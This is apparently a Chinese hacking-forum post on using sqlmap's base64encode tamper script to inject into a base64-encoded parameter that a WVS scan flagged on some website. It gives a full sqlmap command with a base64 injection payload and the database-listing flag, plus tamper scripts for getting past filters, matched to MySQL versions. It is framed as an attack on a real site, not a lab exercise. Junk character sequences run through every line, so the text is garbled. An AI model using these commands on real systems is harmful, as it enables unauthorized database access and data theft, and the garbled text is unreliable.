WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 N4 g; N: Y2 q i( e9 p( X
+ Y- C( L5 F4 j+ `2 ~sqlmap的tamper里有个base64encode.py
, s0 S a& O8 {" @& @
2 B9 S& n9 S* M/ C使用如下 Z% z7 ]2 P" p8 y0 e' K
# K, D. S, B1 `' c$ m: {sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
7 D* ? Q/ e* _' j. k# G* l8 s6 \5 b" ?8 \
* }; Q5 N( K! n. N& f7 y. a1 Bsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
; q* [% v: x) @3 i( X( F: k
! e! y' M" Q3 G( ^0 j其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
& P- p) U. D5 ^3 {. e
! O e. |% a/ S# l( sspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
h' h6 c$ ~2 Q4 C6 o1 Gspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入6 m- ~. k# {. Q% ]7 u9 M8 M
首先确定目标数据库版本,然后选择相应的脚本。7 }# S& L+ j @& r% C1 e* g
-v 3 --batch --tamper "space2hash.py"; V7 e8 h1 w' p4 U8 z
/ s+ q7 @* X: y" ]+ @7 [还有其他一些插件:# X: V3 ~% i) G: G
encodes编码 ——charencode.py. x4 s( P* f! P, g1 t
base64编码 —— base64encode.py
* ~" a! S+ N/ i0 U/ w+ J替换空格和关键字 —— halfversionedmorekeywords.py3 x* S$ x- B _. k( {. A, [& D
|
. D0 ~, @4 Q3 h% w# f& Z6 ]+ P9 D4 d4 d: M q# @
$ R+ G# |) T2 |+ m+ z
: i+ f7 [! p- j8 u5 ~- n, h
|